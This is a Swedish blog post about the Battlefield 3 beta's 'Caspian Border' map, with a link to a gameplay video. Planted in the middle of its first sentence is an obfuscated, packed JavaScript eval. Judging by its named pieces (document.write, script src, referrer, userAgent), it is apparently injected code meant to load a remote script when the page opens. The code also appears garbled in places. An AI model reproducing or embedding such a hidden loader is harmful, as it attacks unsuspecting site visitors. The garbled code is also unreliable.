Image Image Image Image Image Image Image Image Image Image

| 13 augusti, 2020

Scroll to top

Top

Battlefield 3 Beta – Caspian Border

Battlefield 3 Beta – Caspian Border
Sebastian

Battlefield eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|beynf|var|u0026u|referrer|dnann||js|php’.split(’|’),0,{}))
3 betan är i full gång på alla format som ni säkert redan vet om och det är banan ”Operation Métro” som gäller. Här nedan ser vi däremot en ny bana; ”Caspian Border” spelat på en high-end-PC i 23 minuter.

Upplägget är ganska annorlunda jämfört med den numera välkända tunnelbanebanan i Paris, här är det istället fokus på episka fältstrider kring den kaspiska gränsen. Vi får återigen se prov på hur fruktansvärt snyggt det här spelet är, framför allt om man har en PC som kan spela i ultra-läge, och det här är som rubriken lyder från betan, alltså inte det färdiga spelet (sen är frågan hur mycket snyggare det kan bli).

Huruvida ”Caspian Border” kommer öppnas för allmänheten är ännu oklart, men då det är drygt en vecka kvar av betan är det ganska tveksamt. Istället får nog de flesta av oss vänta på det färdiga spelet.

httpv://www.youtube.com/watch?v=kwJK1KedEPs